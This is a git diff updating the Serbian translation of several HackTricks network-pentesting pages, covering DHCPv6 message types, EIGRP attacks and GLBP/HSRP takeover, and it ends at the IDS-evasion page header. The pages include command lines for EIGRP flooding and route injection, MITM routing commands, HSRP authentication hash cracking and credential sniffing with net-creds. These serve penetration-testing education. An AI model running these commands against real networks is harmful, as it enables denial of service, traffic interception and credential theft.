trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} **Try Hard Security Group** @@ -24,12 +25,12 @@ Drugi načini podrške HackTricks-u: Cilj ove stranice je da nabroji **platforme koje omogućavaju pretragu koda** (doslovnog ili regex) u hiljadama/milionskim repozitorijumima na jednoj ili više platformi. -Ovo pomaže u nekoliko situacija za **pretragu procurenih informacija** ili za obrasce **ranjivosti**. +Ovo pomaže u nekoliko prilika za **pretragu procurenih informacija** ili za obrasce **ranjivosti**. * [**SourceGraph**](https://sourcegraph.com/search): Pretraga u milionima repozitorijuma. Postoji besplatna verzija i poslovna verzija (sa 15 dana besplatno). Podržava regexe. -* [**Github Pretraga**](https://github.com/search): Pretraga na Github-u. Podržava regexe. +* [**Github Pretraga**](https://github.com/search): Pretraga širom Github-a. Podržava regexe. * Možda je korisno proveriti i [**Github Pretragu Koda**](https://cs.github.com/). -* [**Gitlab Napredna Pretraga**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): Pretraga kroz Gitlab projekte. Podržava regexe. +* [**Gitlab Napredna Pretraga**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): Pretraga preko Gitlab projekata. Podržava regexe. * [**SearchCode**](https://searchcode.com/): Pretraga koda u milionima projekata. {% hint style="warning" %} @@ -42,16 +43,17 @@ Kada tražite procurene informacije u repozitorijumu i pokrenete nešto poput `g {% embed url="https://discord.gg/tryhardsecurity" %} +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks suvenir**](https://peass.creator-spring.com) -* Otkrijte [**Porodičnu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/generic-methodologies-and-resources/pentesting-network/dhcpv6.md b/generic-methodologies-and-resources/pentesting-network/dhcpv6.md index d95ee4fb5..aee4242ff 100644 --- a/generic-methodologies-and-resources/pentesting-network/dhcpv6.md +++ b/generic-methodologies-and-resources/pentesting-network/dhcpv6.md @@ -1,19 +1,20 @@ +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} ### Poređenje tipova poruka DHCPv6 i DHCPv4 -U tabeli ispod je prikazan poređenje tipova poruka DHCPv6 i DHCPv4: +Komparativni prikaz tipova poruka DHCPv6 i DHCPv4 dat je u tabeli ispod: | Tip poruke DHCPv6 | Tip poruke DHCPv4 | |:-------------------|:-------------------| @@ -24,23 +25,23 @@ U tabeli ispod je prikazan poređenje tipova poruka DHCPv6 i DHCPv4: | Release (8) | DHCPRELEASE | | Information-Request (11) | DHCPINFORM | | Decline (9) | DHCPDECLINE | -| Confirm (4) | none | +| Confirm (4) | nema | | Reconfigure (10) | DHCPFORCERENEW | -| Relay-Forw (12), Relay-Reply (13) | none | +| Relay-Forw (12), Relay-Reply (13) | nema | **Detaljno objašnjenje tipova poruka DHCPv6:** -1. **Solicit (1)**: Inicirano od strane DHCPv6 klijenta da pronađe dostupne servere. -2. **Advertise (2)**: Poslato od strane servera kao odgovor na Solicit, ukazujući na dostupnost DHCP usluge. +1. **Solicit (1)**: Pokreće ga DHCPv6 klijent kako bi pronašao dostupne servere. +2. **Advertise (2)**: Poslat od strane servera kao odgovor na Solicit, ukazujući na dostupnost DHCP usluge. 3. **Request (3)**: Klijenti koriste ovo da zatraže IP adrese ili prefikse od određenog servera. -4. **Confirm (4)**: Koristi se od strane klijenta da proveri da li su dodeljene adrese i dalje važeće na mreži, obično nakon promene mreže. +4. **Confirm (4)**: Koristi ga klijent da proveri da li su dodeljene adrese i dalje važeće na mreži, obično nakon promene mreže. 5. **Renew (5)**: Klijenti šalju ovo originalnom serveru da produže vreme trajanja adresa ili ažuriraju konfiguracije. -6. **Rebind (6)**: Poslato bilo kom serveru da produži vreme trajanja adresa ili ažurira konfiguracije, posebno kada nema odgovora na Renew. +6. **Rebind (6)**: Poslat bilo kom serveru da produži vreme trajanja adresa ili ažurira konfiguracije, posebno kada nema odgovora na Renew. 7. **Reply (7)**: Serveri koriste ovo da pruže adrese, konfiguracione parametre ili da potvrde poruke poput Release ili Decline. 8. **Release (8)**: Klijenti obaveštavaju server da prestane koristiti jednu ili više dodeljenih adresa. -9. **Decline (9)**: Poslato od strane klijenata da prijave da su dodeljene adrese u konfliktu na mreži. +9. **Decline (9)**: Poslat od strane klijenata da prijave da su dodeljene adrese u konfliktu na mreži. 10. **Reconfigure (10)**: Serveri podstiču klijente da pokrenu transakcije za nove ili ažurirane konfiguracije. -11. **Information-Request (11)**: Klijenti zahtevaju konfiguracione parametre bez dodeljivanja IP adrese. +11. **Information-Request (11)**: Klijenti zahtevaju konfiguracione parametre bez dodele IP adrese. 12. **Relay-Forw (12)**: Relej agenti prosleđuju poruke serverima. 13. **Relay-Repl (13)**: Serveri odgovaraju relej agentima, koji zatim dostavljaju poruku klijentu. @@ -48,16 +49,17 @@ U tabeli ispod je prikazan poređenje tipova poruka DHCPv6 i DHCPv4: * [https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages](https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages) +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md b/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md index 076fb86ae..8acf2ca84 100644 --- a/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md +++ b/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md @@ -1,86 +1,72 @@ # Napadi na EIGRP +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Pomozite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} -**Ovo je sažetak napada izloženih na** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9). Pogledajte ga za dalje informacije. +**Ovo je sažetak napada izloženih u** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9). Pogledajte za više informacija. ## **Napad lažnih EIGRP suseda** -- **Cilj**: Preopteretiti CPU rutera poplavljivanjem EIGRP hello paketima, što može dovesti do napada odbijanja usluge (DoS). +- **Cilj**: Preopteretiti CPU rutera poplavljivanjem EIGRP hello paketima, potencijalno dovodeći do napada na uskraćivanje usluge (DoS). - **Alat**: Skripta **helloflooding.py**. -- **Izvršavanje**: +- **Izvršenje**: %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%% - **Parametri**: -- `--interface`: Određuje mrežni interfejs, npr. `eth0`. +- `--interface`: Specificira mrežni interfejs, npr. `eth0`. - `--as`: Definiše broj autonomnog sistema EIGRP-a, npr. `1`. - `--subnet`: Postavlja lokaciju podmreže, npr. `10.10.100.0/24`. -## **Napad EIGRP crne rupe** +## **Napad crne rupe EIGRP-a** -- **Cilj**: Ometanje protoka mrežnog saobraćaja ubacivanjem lažne rute, što dovodi do crne rupe gde se saobraćaj usmerava ka nepostojećoj destinaciji. +- **Cilj**: Poremetiti protok mrežnog saobraćaja ubacivanjem lažne rute, dovodeći do crne rupe gde se saobraćaj usmerava ka nepostojećoj destinaciji. - **Alat**: Skripta **routeinject.py**. -- **Izvršavanje**: +- **Izvršenje**: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%% - **Parametri**: -- `--interface`: Određuje interfejs sistema napadača. -- `--as`: Definiše broj EIGRP autonomnog sistema. +- `--interface`: Specificira interfejs sistema napadača. +- `--as`: Definiše broj AS EIGRP-a. - `--src`: Postavlja IP adresu napadača. -- `--dst`: Postavlja IP adresu ciljne podmreže. -- `--prefix`: Definiše masku ciljne IP adrese podmreže. +- `--dst`: Postavlja IP ciljne podmreže. +- `--prefix`: Definiše masku ciljne IP podmreže. -## **Zloupotreba napada K-vrednosti** +## **Napad zloupotrebe K-vrednosti** -- **Cilj**: Stvaranje kontinuiranih prekida i ponovnih povezivanja unutar EIGRP domena ubacivanjem izmenjenih K-vrednosti, što rezultira napadom DoS. +- **Cilj**: Stvaranje kontinuiranih prekida i ponovnih povezivanja unutar EIGRP domena ubacivanjem izmenjenih K-vrednosti, efikasno rezultirajući napadom na uskraćivanje usluge. - **Alat**: Skripta **relationshipnightmare.py**. -- **Izvršavanje**: +- **Izvršenje**: %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 %%% - **Parametri**: -- `--interface`: Određuje mrežni interfejs. -- `--as`: Definiše broj EIGRP autonomnog sistema. +- `--interface`: Specificira mrežni interfejs. +- `--as`: Definiše broj AS EIGRP-a. - `--src`: Postavlja IP adresu legitimnog rutera. -## **Napad prelivanja tabele rutiranja** +## **Napad preplavljivanja tabele rutiranja** -- **Cilj**: Opterećenje CPU-a i RAM-a rutera poplavljivanjem tabele rutiranja sa brojnim lažnim rutama. +- **Cilj**: Opteretiti CPU i RAM rutera poplavljivanjem tabele rutiranja sa brojnim lažnim rutama. - **Alat**: Skripta **routingtableoverflow.py**. -- **Izvršavanje**: +- **Izvršenje**: %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 %%% - **Parametri**: -- `--interface`: Određuje mrežni interfejs. -- `--as`: Definiše broj EIGRP autonomnog sistema. +- `--interface`: Specificira mrežni interfejs. +- `--as`: Definiše broj AS EIGRP-a. - `--src`: Postavlja IP adresu napadača. - - -
- -Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! - -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. - -
diff --git a/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md b/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md index 6f71d5fb6..71c3e88b6 100644 --- a/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md +++ b/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md @@ -1,41 +1,41 @@ # Napadi GLBP & HSRP +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJATELJSTVO**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %}
{% embed url="https://websec.nl/" %} - ## Pregled FHRP Preuzimanja ### Uvidi u FHRP -FHRP je dizajniran da pruži mrežnu otpornost spajanjem više rutera u jedinicu, čime se poboljšava raspodela opterećenja i tolerancija na greške. Cisco Systems je uveo prominentne protokole u ovoj grupi, poput GLBP i HSRP. +FHRP je dizajniran da pruži mrežnu otpornost spajanjem više rutera u jedinicu virtualnog rutera, čime se poboljšava raspodela opterećenja i tolerancija na greške. Cisco Systems je uveo prominentne protokole u ovoj grupi, poput GLBP i HSRP. ### Uvidi u GLBP Protokol -Cisco-ova kreacija, GLBP, funkcioniše na TCP/IP sloju, koristeći UDP na portu 3222 za komunikaciju. Ruteri u GLBP grupi razmenjuju "hello" pakete na intervalima od 3 sekunde. Ako ruter ne pošalje ove pakete tokom 10 sekundi, pretpostavlja se da je offline. Međutim, ovi tajmeri nisu fiksni i mogu se menjati. +Cisco-ova kreacija, GLBP, funkcioniše na TCP/IP sloju, koristeći UDP na portu 3222 za komunikaciju. Ruteri u GLBP grupi razmenjuju "hello" pakete na intervalima od 3 sekunde. Ako ruter ne pošalje ove pakete tokom 10 sekundi, pretpostavlja se da je van mreže. Međutim, ovi tajmeri nisu fiksni i mogu se menjati. -### Operacije i Raspodela Opterećenja u GLBP-u +### GLBP Operacije i Raspodela Opterećenja GLBP se ističe omogućavanjem raspodele opterećenja preko rutera korišćenjem jedne virtuelne IP adrese uparene sa više virtuelnih MAC adresa. U GLBP grupi, svaki ruter učestvuje u prosleđivanju paketa. Za razliku od HSRP/VRRP, GLBP nudi pravo balansiranje opterećenja kroz nekoliko mehanizama: -- **Balansiranje Opterećenja Zavisno od Hosta:** Održava konzistentno dodeljivanje AVF MAC adrese hostu, što je ključno za stabilne NAT konfiguracije. +- **Balansiranje Opterećenja Zavisno od Hosta:** Održava konzistentno dodeljivanje AVF MAC adrese hostu, što je bitno za stabilne NAT konfiguracije. - **Round-Robin Balansiranje Opterećenja:** Podrazumevani pristup, koji menja dodeljivanje AVF MAC adrese među zahtevajućim hostovima. -- **Balansiranje Opterećenja Ponderisano Round-Robin:** Raspodeljuje opterećenje na osnovu unapred definisanih metrika "Težine". +- **Balansiranje Opterećenja Težinskim Round-Robinom:** Raspodeljuje opterećenje na osnovu unapred definisanih metrika "Težine". -### Ključni Komponenti i Terminologije u GLBP-u -- **AVG (Aktivni Virtuelni Gateway):** Glavni ruter, odgovoran za dodeljivanje MAC adresa ruterima parova. +### Ključni Komponenti i Terminologije u GLBP +- **AVG (Aktivni Virtuelni Gateway):** Glavni ruter, odgovoran za dodeljivanje MAC adresa ruterima vršnjacima. - **AVF (Aktivni Virtuelni Prosleđivač):** Ruter određen za upravljanje mrežnim saobraćajem. - **GLBP Prioritet:** Metrika koja određuje AVG, počevši od podrazumevane vrednosti od 100 i krećući se između 1 i 255. - **GLBP Težina:** Odražava trenutno opterećenje na ruteru, podesivo ručno ili putem Praćenja Objekata. @@ -43,11 +43,11 @@ GLBP se ističe omogućavanjem raspodele opterećenja preko rutera korišćenjem Za interakcije, GLBP koristi rezervisanu multicast adresu 224.0.0.102 i UDP port 3222. Ruteri šalju "hello" pakete na intervalima od 3 sekunde i smatraju se neoperativnim ako se paket propusti tokom 10 sekundi. -### Mehanizam Napada GLBP-a +### Mehanizam Napada GLBP Napadač može postati primarni ruter slanjem GLBP paketa sa najvišom vrednošću prioriteta (255). Ovo može dovesti do DoS ili MITM napada, omogućavajući presretanje ili preusmeravanje saobraćaja. -### Izvođenje Napada GLBP-a pomoću Lokija -[Loki](https://github.com/raizo62/loki_on_kali) može izvršiti GLBP napad ubacivanjem paketa sa postavljenim prioritetom i težinom na 255. Pre-napad koraci uključuju prikupljanje informacija poput virtuelne IP adrese, prisustva autentikacije i vrednosti prioriteta rutera korišćenjem alata poput Wireshark. +### Izvođenje Napada GLBP sa Loki +[Loki](https://github.com/raizo62/loki_on_kali) može izvršiti GLBP napad ubrizgavanjem paketa sa postavljenim prioritetom i težinom na 255. Pred-napad koraci uključuju prikupljanje informacija poput virtuelne IP adrese, prisustva autentikacije i vrednosti prioriteta rutera korišćenjem alata poput Wireshark. Koraci Napada: 1. Prebacite se u promiskuitetni režim i omogućite IP prosleđivanje. @@ -60,7 +60,7 @@ Koraci Napada: Prateći ove korake, napadač se pozicionira kao "čovek u sredini", sposoban za presretanje i analizu mrežnog saobraćaja, uključujući nešifrovane ili osetljive podatke. -Za demonstraciju, ovde su potrebni delovi komandi: +Za demonstraciju, evo potrebnih komandi: ```bash # Enable promiscuous mode and IP forwarding sudo ip link set eth0 promisc on @@ -77,20 +77,20 @@ sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100 ### Pasivno objašnjenje HSRP preuzimanja sa detaljima komandi #### Pregled HSRP (Hot Standby Router/Redundancy Protocol) -HSRP je Cisco vlasnički protokol dizajniran za redundanciju mrežnih gateway-a. Omogućava konfiguraciju više fizičkih rutera u jedinicu sa zajedničkom IP adresom. Ova logička jedinica je upravljana primarnim routerom odgovornim za usmeravanje saobraćaja. Za razliku od GLBP-a, koji koristi metrike poput prioriteta i težine za balansiranje opterećenja, HSRP se oslanja na jedan aktivni router za upravljanje saobraćajem. +HSRP je Cisco vlasnički protokol dizajniran za redundanciju mrežnih gateway-a. Omogućava konfiguraciju više fizičkih rutera u jedinicu sa zajedničkom IP adresom. Ova logička jedinica je upravljana primarnim routerom odgovornim za usmeravanje saobraćaja. Za razliku od GLBP-a, koji koristi metrike poput prioriteta i težine za balansiranje opterećenja, HSRP se oslanja na jednog aktivnog rutera za upravljanje saobraćajem. #### Uloge i terminologija u HSRP-u -- **HSRP Aktivni Router**: Uređaj koji deluje kao gateway, upravlja protokom saobraćaja. -- **HSRP Rezervni Router**: Rezervni router, spreman da preuzme ulogu ako aktivni router zakaže. +- **HSRP Aktivni Router**: Uređaj koji deluje kao gateway, upravljajući protokom saobraćaja. +- **HSRP Standby Router**: Rezervni router, spreman da preuzme ulogu ako aktivni router zakaže. - **HSRP Grupa**: Skup rutera koji sarađuju kako bi formirali jedan otporan virtuelni router. - **HSRP MAC Adresa**: Virtuelna MAC adresa dodeljena logičkom routeru u HSRP postavci. - **HSRP Virtuelna IP Adresa**: Virtuelna IP adresa grupe HSRP, deluje kao podrazumevani gateway za povezane uređaje. #### Verzije HSRP-a -HSRP dolazi u dve verzije, HSRPv1 i HSRPv2, koje se razlikuju uglavnom po kapacitetu grupe, korišćenju multicast IP adresa i strukturi virtuelne MAC adrese. Protokol koristi specifične multicast IP adrese za razmenu informacija o uslugama, sa Hello paketima koji se šalju svakih 3 sekunde. Router se smatra neaktivnim ako ne primi paket u intervalu od 10 sekundi. +HSRP dolazi u dve verzije, HSRPv1 i HSRPv2, koje se razlikuju uglavnom po kapacitetu grupe, korišćenju multicast IP adresa i strukturi virtuelne MAC adrese. Protokol koristi specifične multicast IP adrese za razmenu informacija o uslugama, sa Hello paketima poslatim svakih 3 sekunde. Router se smatra neaktivnim ako ne primi paket u intervalu od 10 sekundi. -#### Mehanizam napada na HSRP -Napadi na HSRP uključuju prisilno preuzimanje uloge Aktivnog Routera ubacivanjem maksimalne vrednosti prioriteta. Ovo može dovesti do napada čovek-u-sredini (MITM). Bitni koraci pre napada uključuju prikupljanje podataka o HSRP postavci, što se može uraditi korišćenjem Wireshark-a za analizu saobraćaja. +#### Mehanizam napada HSRP-a +Napadi HSRP-a uključuju prisilno preuzimanje uloge Aktivnog Routera ubrizgavanjem maksimalne vrednosti prioriteta. Ovo može dovesti do napada čovek-u-sredini (MITM). Bitni koraci pre napada uključuju prikupljanje podataka o HSRP postavci, što se može uraditi korišćenjem Wireshark-a za analizu saobraćaja. #### Koraci za zaobilaženje HSRP autentikacije 1. Sačuvajte mrežni saobraćaj koji sadrži HSRP podatke kao .pcap fajl. @@ -106,7 +106,7 @@ python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes john --wordlist=mywordlist.txt hsrp_hashes ``` -**Izvršavanje HSRP ubacivanja pomoću Lokija** +**Izvršavanje HSRP ubrizgavanja pomoću Lokija** 1. Pokrenite Lokija da identifikujete HSRP oglase. 2. Postavite mrežni interfejs u promiskuitetni režim i omogućite prosleđivanje IP adresa. @@ -120,12 +120,12 @@ sudo sysctl -w net.ipv4.ip_forward=1 sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0 sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE ``` -5. Izmenite rutiranje tabele da rutira saobraćaj preko prethodnog Aktivnog Routera. +5. Izmenite rutiranje tabele da rutira saobraćaj preko bivšeg Aktivnog Routera. ```shell sudo route del default sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100 ``` -6. Koristite net-creds.py ili sličan alat da uhvatite akreditacije iz presretnutog saobraćaja. +6. Koristite net-creds.py ili sličan alat da uhvatite akreditive iz presretnutog saobraćaja. ```shell sudo python2 net-creds.py -i eth0 ``` diff --git a/generic-methodologies-and-resources/pentesting-network/ids-evasion.md b/generic-methodologies-and-resources/pentesting-network/ids-evasion.md index 83ec81302..a6a197f0e 100644 --- a/generic-methodologies-and-resources/pentesting-network/ids-evasion.md +++ b/generic-methodologies-and-resources/pentesting-network/ids-evasion.md @@ -1,21 +1,22 @@ +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
